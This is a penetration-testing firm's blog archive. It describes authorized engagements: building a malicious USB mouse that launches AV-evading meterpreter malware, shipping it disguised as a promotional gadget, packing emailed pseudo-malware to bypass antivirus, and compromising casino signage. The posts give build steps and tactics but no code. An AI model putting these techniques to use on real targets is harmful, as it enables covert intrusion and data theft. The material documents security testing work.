Posts Tagged ‘penetration test’

Netragard’s Hacker Interface Device (HID).

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services what so ever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.

The first method of attack that people might think of when faced with a challenge like this is the use of the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug it in; when they do its game over, they’re infected. That trick worked great back in the day but not so much any more. The first issue is that most people are well aware of the USB stick threat due to the many published articles about the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.

Enter PRION, the evil HID.


 

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but instead is composed of electronics which include a teensy microcontroller, a micro USB hub (small one from RadioShack), a mini USB cable (we needed the ends) a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we choose to use a fancy USB logitech mouse as our Hacker Interface Device / Attack Platform. To turn our logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceed to use a drummel tool to shave away the extra plastic on the inside cover of the mouse. (There were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable, cut one of the ends off leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board making sure to follow theright pinout pattern. This is the cable that will plug into the teensy mini USB port when we insert the teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end leaving 2 inchs of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub making sure to follow the right pinout patterns mentioned above. This is an important cable as its the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we have three cables soldered to the USB hub. Just to recap those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the the attack would be mostly moot. ( We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered the ends to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape as to avoid any shorts. Once everything was we plugged in we tested the devices. The USB drive mounted, the teensy card was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using Mcafee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering but we certainly were allowed to do reconnaissance against social networks. With Mcafee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, we also wanted the capabilities provided by meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…

Update: As of 06/29/2011 9AM EST: this variant of our pseudomalware is being detected by Mcafee.

Update: As of 06/29/2011 10:47AM EST: we’ve created a new variant that seems to bypass any AV.

To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by Mcafee. When we ran our tests on a machine running Mcafee, the malware ran without a hitch. We should point out that our ability to evade Mcafee isn’t any indication of quality and that we can evade any Antivirus solution using similar custom attack methodologies. After all, its impossible to detect something if you don’t know what it is that you are looking for (It also helps to have a team of researchers at our disposal).

Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. Then we wrote some code for the teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw’s website who deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.

Usage: Plug mouse into computer, get pwned.

The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used Jigsaw to purchase a list of our client’s employes. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse and made it look like a promotional gadget, added fake marketing flyers, etc. then shipped the mouse. Sure enough, three days later the mouse called home.

 

PDF    Send article as PDF   

Netragard Signage Snatching

Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods in which a malicious hacker could potentially disrupt a sporting event, concert, or other large scale and highly visible event.

During the course of the these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems.  Until recently, even I hadn’t thought about how extensively network controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards.  That is, until our most recent casino project.

Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility.  Some people may think to themselves, “ok, what’s the big deal with that?”.  The answer is simple:  Customer perception and corporate image.

Before I continue on, let me provide some background; Early in 2008, there were two incidents in California where two on-highway digital billboards were compromised, and their displays changed from the intended display.  While both of these incidents were small pranks in comparison to what they could have done, the effect was remembered by those who drove by and saw the signs.  (Example A, Example B)

Another recent billboard hack in Moscow, Russia, wasn’t as polite as the pranksters in California.  A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world), and after subsequently gaining access, looped a video clip of pornographic material. (Example C) Imagine if this was a sports organization, and this happened during a major game.

Brining this post back on track, let’s refocus on the casino and the potential impact of signage compromise.  After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size.  WIth customer permission, we placed a unique image on a small sign for proof of concept purposes (go google “stallowned”).  This test, coupled with an impact audit, clearly highlighted to the casino that ensuring the security of their signage systems was nearly as paramount to securing their security systems, cage systems, and domain controllers.   All the domain security in the world means little to a customer if they’re presented with disruptive material on the signage during their visit to the casino.  A compromise of this nature could cause significant loss or revenue, and cause a customer to never re-visit the casino.

I also thought it pertinent for the purpose of this post to share another customer engagement story.  This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.

Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition.   During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements.  More so, our engineers were able to utilize the social engineering skills and “convince” the physical site staff to grant them building access.  Once passing this first layer of physical access, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms.  These facilities/rooms were key to the organizations intellectual property, and on-going research.  Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.

By combining network exploitation and social engineering, we’ve postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage.  Inevitably, during these discussions the organizations push back stating that their facilities have trained security staff and access control systems.  To that we inform them that the majority of sports facilities staff are more attuned to illicit access attempts in controlled areas, but only during certain periods of operation, such as active games, concerts, and other large scale events.   During non-public usage hours though, there’s a high probability that a skilled individual could gain entry to access controlled areas during a private event, or through beach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.

One area of concern for any organization, whether they be a football organization, Fortune 100 company, or a mid-size business, is breach of trust with their consumer base.  For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public.  Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering an socio-political agenda.  We’re hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.

– Mike Lockhart, VP of Operations

PDF Printer    Send article as PDF   

The Human Vulnerability

It seems to us that one of the biggest threats that businesses face today is socially augmented malware attacks. These attacks have an extremely high degree of success because they target and exploit the human element. Specifically, it doesn’t matter how many protective technology layers you have in place if the people that you’ve hired are putting you at risk, and they are.

Case in point, the “here you have” worm that propagates predominantly via e-mail and promises the recipient access to PDF documents or even pornographic material. This specific worm compromised major organizations such as NASA, ABC/Disney, Comcast, Google Coca-Cola, etc. How much money do you think that those companies spend on security technology over a one-year period? How much good did it do at protecting them from the risks introduced by the human element? (Hint: none)

Here at Netragard we have a unique perspective on the issue of malware attacks because we offer pseudo-malware testing services. Our pseudo-malware module, when activated, authorizes us to test our clients with highly customized, safe, controlled, and homegrown pseudo-malware variants. To the best of our knowledge we are the only penetration testing company to offer such a service (and no, we’re not talking about the meterpreter).

Attack delivery usually involves attaching our pseudo-malware to emails or binding the pseudo-malware to PDF documents or other similar file types. In all cases we make it a point to pack (or crypt) our pseudo-malware so that it doesn’t get detected by antivirus technology (see this blog entry on bypassing antivirus). Once the malware is activated, it establishes an encrypted connection back to our offices and provides us with full control over the victim computer. Full control means access to the software and hardware including but not limited to keyboard, mouse, microphone and even the camera. (Sometimes we even deliver our attacks via websites like this one by embedding attacks into links).

So how easy is it to penetrate a business using pseudo-malware? Well in truth its really easy. Just last month we finished delivering an advanced external penetration test for one of our more secure customers. We began crafting an email that contained our pseudo-malware attachment and accidentally hit the send button without any message content. Within 45 seconds of clicking the send button and sending our otherwise blank email, we had 15 inbound connections from 15 newly infected client computer systems. That means that at least 15 employees tried to open our pseudo-malware attachment despite the fact that the email was blank! Imagine the degree of success that is possible with a well-crafted email?

One of the computer systems that we were able to compromise was running a service with domain admin privileges. We were able to use that computer system (impersonation attack involved) to create an account for ourselves on the domain (which happened to be the root domain). From there we were able to compromise the client’s core infrastructure (switches, firewalls, etc) due to a password file that we found sitting on someone’s desktop (thank you for that). Once that was done, there really wasn’t much more that we had left to do, it was game over.

The fact of the matter is that there’s nothing new about taking advantage of people that are willing to do stupid things. But is it really stupidity or is it just that employees don’t have a sense of accountability? Our experience tells us that in most cases its a lack of accountability that’s the culprit.

When we compromise a customer using pseudo-malware, one of the recommendations that we make to them is that they enforce policies by holding employees accountable for violations. We think that the best way to do that is to require employees to read a well-crafted policy and then to take a quiz based on that policy. When they pass the quiz they should be required to sign a simple agreement that states that they have read the policy, understood the policy, and agree to be held accountable for any violations that they make against the policy.

In our experience there is no better security technology than a paranoid human that is afraid of being held accountable for doing anything irresponsible (aka: violating the policy). When people are held accountable for something like security they tend to change their overall attitude towards anything that might negatively affect it. The result is a significantly reduced attack surface. If all organizations took this strict approach to policy enforcement then worms like the “here you have” worm wouldn’t be such a big success.

Compare the cost and benefit of enforcing a strict and carefully designed security policy to the cost and benefit of expensive (and largely ineffective) security technologies. Which do you think will do a better job at protecting your business from real threats? Its much more difficult to hack a network when that network is managed by people that are held accountable for its security than it is to hack a network that is protected technology alone.

So in the end there’s really nothing special about the “here you have” worm. It’s just another example of how malicious hackers are exploiting the same human vulnerability using an ever so slightly different malware variant. Antivirus technology certainly won’t save you and neither will other expensive technology solutions, but a well-crafted, cost-effective security policy just might do the trick.

It’s important to remember that well written security policies don’t only impact human behavior, but generally result in better management of systems, which translates to better technological security. The benefits are significant and the overall cost isn’t in comparison.

PDF Download    Send article as PDF   

Professional Script Kiddies vs Real Talent

The Good Guys in the security world are no different from the Bad Guys; most of them are nothing more than glorified Script Kidies. The fact of the matter is that if you took all of the self-proclaimed hackers in the world and you subjected them to a litmus test, very few would pass as acutal hackers.

This is true for both sides of the so called Black and White hat coin. In the Black Hat world, you have script-kids who download programs that are written by other people then use those programs to “hack” into networks. The White Hat’s do the exact same thing; only they buy the expensive tools instead of downloading them for free. Or maybe they’re actually paying for the pretty GUI, who knows?

What is pitiable is that in just about all cases these script kiddies have no idea what the programs actually do. Sometimes that’s because they don’t bother to look at the code, but most of the time its because they just can’t understand it. If you think about it that that is scary. Do you really want to work with a security company that launches attacks against your network with tools that they do not fully understand? I sure wouldn’t.

This is part of the reason why I feel that it is so important for any professional security services provider to maintain an active research team. I’m not talking about doing market research and pretending that its security research like so many security companies do. I’m talking about doing actual vulnerability research and exploit development to help educate people about risks for the purposes of defense. After all, if a security company can’t write an exploit then what business do they have launching exploits against your company?

I am very proud to say that Everything Channel recently released the 2010 CRN Security Researchers list and that Netragard’s Kevin Finisterre was on the list. Other people that were included in the list are people that I have the utmost respect for. As far as I am concerned, these are some of the best guys in the industry: (clearly this list is not all inclusive and in no way includes all of the people that deserve credit for their contributions and/or talent).

  • Dino Dai Zovi
  • Kevin Finisterre
  • Landon Fuller
  • Robert Graham
  • Jeremiah Grossman
  • Larry Highsmith
  • Billy Hoffman
  • Mikko Hypponen
  • Dan Kaminsky
  • Paul Kocher
  • Nate Lawson
  • David Litchfield
  • Charles Miller
  • Jeff Moss
  • Jose Nazario
  • Joanna Rutkowska

In the end I suppose it all boils down to what the customer wants. Some customers want to know their risks; others just want to put a check in the box. For those who want to know what their real risks are, you’ve come to the right place.

Create PDF    Send article as PDF   

Social Engineering — Its Nothing New

With all the recent hype about Social Engineering we figured that we’d chime in and tell people what’s really going on. The fact is that Social Engineering is nothing more than a Confidence Trick being carried out by a Con Artist. The only difference between the term Social Engineering and Confidence Trick is that Social Engineering is predominately used with relation to technology.

So what is it really? Social Engineering is the act of exploiting a person’s natural tendency to trust another person or entity. Because the vulnerability exists within people, there is no truly effective method for remediation. That is not to say that you cannot protect your sensitive data, but it is to say that you cannot always prevent your people or even yourself from being successfully conned.

The core ingredients required to perform a successful confidence trick are no different today then they were before the advent of the Internet. The con artist must have the victim’s trust, and then trick the victim into performing an action or divulging information. The Internet certainly didn’t create the risk but it does make it easier for the threat to align with the risk.

Before the advent of the Internet the con artist (threat) needed to contact the victim (risk) via telephone, in person, via snail mail, etc. Once contact was made a good story needed to be put into place and the victim’s trust needed to be earned. That process could take months or even years and even then success isn’t guaranteed.

The advent of the Internet provided the threat with many more avenues’ through which it could successfully align with the risk. Specifically, the Internet enables the threat to align with hundreds or even thousands of risks simultaneously. That sort of shotgun approach couldn’t be done before and significantly increases an attackers chances of success. One of the most elementary examples of this shotgun approach is the email based phishing attack.

The email based phishing attack doesn’t earn the trust of its victims; it steals trust from existing relationships. Those relationships might exist between the victim and their bank, family member, co-worker, employer, etc. In all instances the email based phishing attack hinges on the attacker’s ability to send emails that look like they are coming from a trusted source (exploitation of trust). From a technical perspective, email spoofing and phishing is trivial (click here for a more sophisticated attack example).

The reason why it is possible for an attacker to steal trust from a victim instead of earning that trust is because “face to face” trust isn’t portable to the Internet. For example, most people trust their spouse. Many people talk to their spouse on AIM, MSN, Yahoo, Skype, etc. while at work. How do they know that they are really chatting with their spouse and not a hacker?

So how do you protect against the social risks and prevent the threat from successfully aligning with those risks? The truth is that you can’t. Con artists have been conning people since the dawn of man. The better question what are you doing to protect your data from the hacker that does penetrate into your IT Infrastructure?

Free PDF    Send article as PDF   

ROI of good security.

The cost of good security is a fraction of the cost of damages that usually result from a single successful compromise. When you choose the inexpensive security vendor, you are getting what you pay for. If you are looking for a check in the box instead of good security services, then maybe you should re-evaluate your thinking because you might be creating a negative Return on Investment.

Usually a check in the box means that you comply with some sort of regulation, but that doesn’t mean that you are actually secure. As a matter of fact, almost all networks that contain credit card information and are successfully hacked are PCI compliant (a real example). That goes to show that compliance doesn’t protect you from hackers, it only protects you from auditors and the fines that they can impose. Whats more is that those fines are only a small fraction of the cost of the damages that can be caused by a single successful hack.

When a computer system is hacked, the hacker doesn’t stop at one computer. Standard hacker practice is to perform Distributed Metastasis and propagate the penetration throughout the rest of the network. This means that within a matter of minutes the hacker will likely have control over the most or all of the critical aspects of your IT infrastructure and will also have access to your sensitive data. At that point you’ve lost the battle… but you were compliant, you paid for the scan and now you’ve got a negative Return on that Investment (“ROI”).

So what are the damages? Its actually impossible to determine the exact cost in damages that result from a single successful hack because its impossible to be certain of the full extent of the compromise. Never the less, here are some of the areas to consider when attempting to calculate damages:

  • Man hours to identify every compromised device
  • Man hours to reinstall and configure every device
  • Man hours required to check source code for malicious alterations
  • Man hours to monitor network traffic for hits of malicious traffic or access
  • Man hours to educate customers
  • Penalties and fines.
  • The cost of downtime
  • The cost of lost customers
  • The cost of a damaged reputation
  • etc.

(The damages could *easily* cost well over half a million dollars on a network of only ~50 or so computers. )

Now lets consider the Return on Investment of *good* security. An Advanced Penetration Test against a small IT Infrastructure (~50 computers in total) might cost something around $16,000.00-$25,000 for an 80 hour project. If that service is delivered by a quality vendor then it will enable you to identify and eliminate your risks before they are exploited by a malicious hacker. The ROI of the quality service would be equal to the cost in damages of a single successful compromise minus the cost of the services. Not to mention you’d be complaint too…

(Note: the actual cost of services varies quite a bit depending on what needs to be done, etc.)

So why is it that some vendors will do this work for $500.00 or $2,000.00, etc? Its simple, they are not delivering the same quality service as the quality vendor. When you pay $500.00 for a vulnerability scan you are paying for something that you could do yourself for free (go download nessus). Never the less, when you pay $500.00 you are really only paying for about 5 minutes of manual labor, the rest of the work is automated and done by the tools. (If you broke that down to an hourly rate you’d be paying something like $6000.00 an hour since you’re paying $500.00 per 5 minutes). In the end you might end up with a check in your compliance box but you’ll still just as vulnerable as you were in the beginning.

PDF Creator    Send article as PDF   
Return top

INFORMATION

Change this sentence and title from admin Theme option page.